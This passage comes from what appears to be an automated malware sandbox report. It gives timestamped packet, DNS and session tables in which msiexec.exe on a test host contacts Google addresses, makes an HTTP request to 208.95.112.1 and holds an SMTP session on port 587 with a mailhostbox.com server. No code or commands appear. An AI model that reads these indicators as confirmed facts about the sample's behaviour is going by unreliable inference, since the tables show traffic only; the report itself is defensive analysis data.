Nov 5, 2024 16:10:25.520821095 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.520824909 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.520867109 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.524250984 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.524365902 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.524369001 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.524405003 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.527754068 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.527800083 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.527803898 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.527837038 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.531116009 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.531167030 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.531171083 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.531205893 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.534447908 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.534547091 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.534549952 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.534590960 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.537679911 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.537822008 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.537827015 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.537863016 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.541156054 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.541199923 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.541203976 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.541239023 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.544370890 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.544435024 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.544437885 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.544477940 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.547712088 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.547769070 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.547771931 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.547811031 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.550887108 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.550942898 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.550946951 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.550981045 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.553997993 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.554049969 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.554053068 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.554084063 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.557147026 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.557199955 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.557204008 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.557245970 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.560041904 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.560092926 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.560096979 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.560127974 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.563246965 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.563297987 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.563335896 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.563373089 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.568460941 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.568527937 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.568531990 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.568564892 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.569226027 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.569269896 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.569278955 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.569312096 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.572649002 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.572699070 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.572701931 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.572737932 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.575228930 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.575275898 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.575278997 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.575310946 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.578023911 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.578068972 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.578073025 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.578109026 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.580895901 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.580949068 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.580952883 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.580986023 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.583726883 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.583777905 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.583781004 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.583811045 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.586580992 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.586627960 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.586632013 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.586664915 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.589600086 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.589648008 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.589652061 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.589683056 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.592313051 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.592354059 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.592358112 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.592394114 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.592397928 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.592432022 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.595947981 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.595993042 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.595995903 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.596026897 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.601607084 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.601655960 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.601660013 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.601691961 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.607131004 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.607192993 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.609214067 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.609261036 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.612540007 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.612595081 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.612598896 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.612631083 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.647454023 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647505999 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647530079 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647555113 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647578001 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647602081 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647628069 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647628069 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.647635937 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647691965 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.647697926 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647733927 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.647769928 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647803068 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.647804976 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647811890 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.647860050 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.648458004 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.648504019 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.648507118 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.648513079 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.648542881 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.648545980 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.648570061 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.648576021 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.648578882 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.648612022 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.650743961 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.650787115 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.650788069 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.650794983 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.650821924 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.650825977 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.650854111 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.652848005 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.652892113 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.652894974 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.652929068 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.656424999 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.656471968 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.656476021 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.656505108 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.659663916 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.659714937 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.659718990 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.659750938 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.663325071 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.663373947 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.665962934 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.666013002 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.666199923 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.666238070 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.666240931 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.666271925 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.666328907 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.666352034 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.666397095 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:26.010294914 CET | 49913 | 443 | 192.168.2.9 | 172.67.74.152 |
Nov 5, 2024 16:10:26.010320902 CET | 443 | 49913 | 172.67.74.152 | 192.168.2.9 |
Nov 5, 2024 16:10:26.010454893 CET | 49913 | 443 | 192.168.2.9 | 172.67.74.152 |
Nov 5, 2024 16:10:26.012870073 CET | 49913 | 443 | 192.168.2.9 | 172.67.74.152 |
Nov 5, 2024 16:10:26.012878895 CET | 443 | 49913 | 172.67.74.152 | 192.168.2.9 |
Nov 5, 2024 16:10:26.624542952 CET | 443 | 49913 | 172.67.74.152 | 192.168.2.9 |
Nov 5, 2024 16:10:26.624676943 CET | 49913 | 443 | 192.168.2.9 | 172.67.74.152 |
Nov 5, 2024 16:10:26.627796888 CET | 49913 | 443 | 192.168.2.9 | 172.67.74.152 |
Nov 5, 2024 16:10:26.627804995 CET | 443 | 49913 | 172.67.74.152 | 192.168.2.9 |
Nov 5, 2024 16:10:26.628032923 CET | 443 | 49913 | 172.67.74.152 | 192.168.2.9 |
Nov 5, 2024 16:10:26.635334969 CET | 49913 | 443 | 192.168.2.9 | 172.67.74.152 |
Nov 5, 2024 16:10:26.679328918 CET | 443 | 49913 | 172.67.74.152 | 192.168.2.9 |
Nov 5, 2024 16:10:26.882175922 CET | 443 | 49913 | 172.67.74.152 | 192.168.2.9 |
Nov 5, 2024 16:10:26.882364988 CET | 443 | 49913 | 172.67.74.152 | 192.168.2.9 |
Nov 5, 2024 16:10:26.882458925 CET | 49913 | 443 | 192.168.2.9 | 172.67.74.152 |
Nov 5, 2024 16:10:26.889931917 CET | 49913 | 443 | 192.168.2.9 | 172.67.74.152 |
Nov 5, 2024 16:10:26.906929016 CET | 49919 | 80 | 192.168.2.9 | 208.95.112.1 |
Nov 5, 2024 16:10:26.912282944 CET | 80 | 49919 | 208.95.112.1 | 192.168.2.9 |
Nov 5, 2024 16:10:26.912353039 CET | 49919 | 80 | 192.168.2.9 | 208.95.112.1 |
Nov 5, 2024 16:10:26.912455082 CET | 49919 | 80 | 192.168.2.9 | 208.95.112.1 |
Nov 5, 2024 16:10:26.917506933 CET | 80 | 49919 | 208.95.112.1 | 192.168.2.9 |
Nov 5, 2024 16:10:27.506899118 CET | 80 | 49919 | 208.95.112.1 | 192.168.2.9 |
Nov 5, 2024 16:10:27.547525883 CET | 49919 | 80 | 192.168.2.9 | 208.95.112.1 |
Nov 5, 2024 16:10:28.904753923 CET | 49919 | 80 | 192.168.2.9 | 208.95.112.1 |
Nov 5, 2024 16:10:28.910810947 CET | 80 | 49919 | 208.95.112.1 | 192.168.2.9 |
Nov 5, 2024 16:10:28.913022041 CET | 49919 | 80 | 192.168.2.9 | 208.95.112.1 |
Nov 5, 2024 16:10:29.205523968 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:29.210424900 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:29.210506916 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:29.785978079 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:29.786206961 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:29.791043997 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:29.941250086 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:29.941703081 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:29.946557045 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.099355936 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.103043079 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:30.108359098 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.264606953 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.266959906 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:30.272027016 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.423809052 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.424019098 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:30.428886890 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.648905993 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.651019096 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:30.659039974 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.807342052 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.807981014 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:30.808031082 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:30.808062077 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:30.808073997 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Nov 5, 2024 16:10:30.812908888 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.812994957 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.813112020 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:30.813121080 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:31.091789961 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 |
Nov 5, 2024 16:10:31.141311884 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 5, 2024 16:10:20.368829012 CET | 60832 | 53 | 192.168.2.9 | 1.1.1.1 |
Nov 5, 2024 16:10:20.375813961 CET | 53 | 60832 | 1.1.1.1 | 192.168.2.9 |
Nov 5, 2024 16:10:21.738379002 CET | 57452 | 53 | 192.168.2.9 | 1.1.1.1 |
Nov 5, 2024 16:10:21.744918108 CET | 53 | 57452 | 1.1.1.1 | 192.168.2.9 |
Nov 5, 2024 16:10:25.997361898 CET | 53528 | 53 | 192.168.2.9 | 1.1.1.1 |
Nov 5, 2024 16:10:26.005872965 CET | 53 | 53528 | 1.1.1.1 | 192.168.2.9 |
Nov 5, 2024 16:10:26.897666931 CET | 54009 | 53 | 192.168.2.9 | 1.1.1.1 |
Nov 5, 2024 16:10:26.906153917 CET | 53 | 54009 | 1.1.1.1 | 192.168.2.9 |
Nov 5, 2024 16:10:28.909632921 CET | 52909 | 53 | 192.168.2.9 | 1.1.1.1 |
Nov 5, 2024 16:10:29.193836927 CET | 53 | 52909 | 1.1.1.1 | 192.168.2.9 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 5, 2024 16:10:20.368829012 CET | 192.168.2.9 | 1.1.1.1 | 0xb6ac | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 5, 2024 16:10:21.738379002 CET | 192.168.2.9 | 1.1.1.1 | 0x3fdd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 5, 2024 16:10:25.997361898 CET | 192.168.2.9 | 1.1.1.1 | 0xa6a4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 5, 2024 16:10:26.897666931 CET | 192.168.2.9 | 1.1.1.1 | 0xe9b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 5, 2024 16:10:28.909632921 CET | 192.168.2.9 | 1.1.1.1 | 0xbea9 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 5, 2024 16:09:45.702630997 CET | 1.1.1.1 | 192.168.2.9 | 0x3a8c | No error (0) | azurefd-t-fb-prod.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 5, 2024 16:09:45.702630997 CET | 1.1.1.1 | 192.168.2.9 | 0x3a8c | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 5, 2024 16:09:45.702630997 CET | 1.1.1.1 | 192.168.2.9 | 0x3a8c | No error (0) | 13.107.253.45 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:20.375813961 CET | 1.1.1.1 | 192.168.2.9 | 0xb6ac | No error (0) | 216.58.206.46 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:21.744918108 CET | 1.1.1.1 | 192.168.2.9 | 0x3fdd | No error (0) | 142.250.185.193 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:26.005872965 CET | 1.1.1.1 | 192.168.2.9 | 0xa6a4 | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:26.005872965 CET | 1.1.1.1 | 192.168.2.9 | 0xa6a4 | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:26.005872965 CET | 1.1.1.1 | 192.168.2.9 | 0xa6a4 | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:26.906153917 CET | 1.1.1.1 | 192.168.2.9 | 0xe9b | No error (0) | 208.95.112.1 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:29.193836927 CET | 1.1.1.1 | 192.168.2.9 | 0xbea9 | No error (0) | us2.smtp.mailhostbox.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:29.193836927 CET | 1.1.1.1 | 192.168.2.9 | 0xbea9 | No error (0) | 208.91.199.223 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:29.193836927 CET | 1.1.1.1 | 192.168.2.9 | 0xbea9 | No error (0) | 208.91.198.143 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:29.193836927 CET | 1.1.1.1 | 192.168.2.9 | 0xbea9 | No error (0) | 208.91.199.224 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:10:29.193836927 CET | 1.1.1.1 | 192.168.2.9 | 0xbea9 | No error (0) | 208.91.199.225 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.9 | 49919 | 208.95.112.1 | 80 | 764 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Nov 5, 2024 16:10:26.912455082 CET | 80 | OUT | |
Nov 5, 2024 16:10:27.506899118 CET | 174 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.9 | 49879 | 216.58.206.46 | 443 | 764 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-05 15:10:21 UTC | 208 | OUT | |
2024-11-05 15:10:21 UTC | 1610 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.9 | 49889 | 142.250.185.193 | 443 | 764 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
